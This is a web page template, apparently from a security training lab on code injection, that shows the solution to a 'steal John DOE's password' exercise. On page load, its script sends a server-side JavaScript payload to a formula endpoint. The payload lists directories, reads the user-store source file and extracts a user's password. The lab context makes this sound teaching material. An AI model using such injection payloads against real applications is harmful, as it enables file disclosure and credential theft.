{{#section 'head'}}
    <script>

        document.addEventListener('DOMContentLoaded', () => {

            fetch(`/code-injection/formulas`, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({
                    formula: `
[
    "Password:",
    require('../user/user-store.js').userStore.getUserByUsername({username: 'johndoe'}).password,
    "How?",
    "> require('fs').readdirSync('.')",
    require('fs').readdirSync('.').toString(),
    "> require('fs').readdirSync('src')",
    require('fs').readdirSync('src').toString(),
    "> require('fs').readdirSync('src/app')",
    require('fs').readdirSync('src/app').toString(),
    "> require('fs').readdirSync('src/app/user')",
    require('fs').readdirSync('src/app/user').toString(),
    "> require('fs').readFileSync('src/app/user/user-store.js')",
    require('fs').readFileSync('src/app/user/user-store.js').toString(),
    "> require('../user/user-store.js').userStore.getUserByUsername({username: 'johndoe'}).password",
    require('../user/user-store.js').userStore.getUserByUsername({username: 'johndoe'}).password
].join('\\n')
`
                })
            })
                    .then((response) => response.json())
                    .then((data) => document.querySelector('#wt-output').textContent = data.result);

        });

    </script>

{{/section}}

{{#if shouldShowSolution}}
    <a href="/code-injection/solution">SHOW SOLUTION</a>
{{/if}}

<p>Try to steal John DOE's password.</p>

<pre id="wt-output"></pre>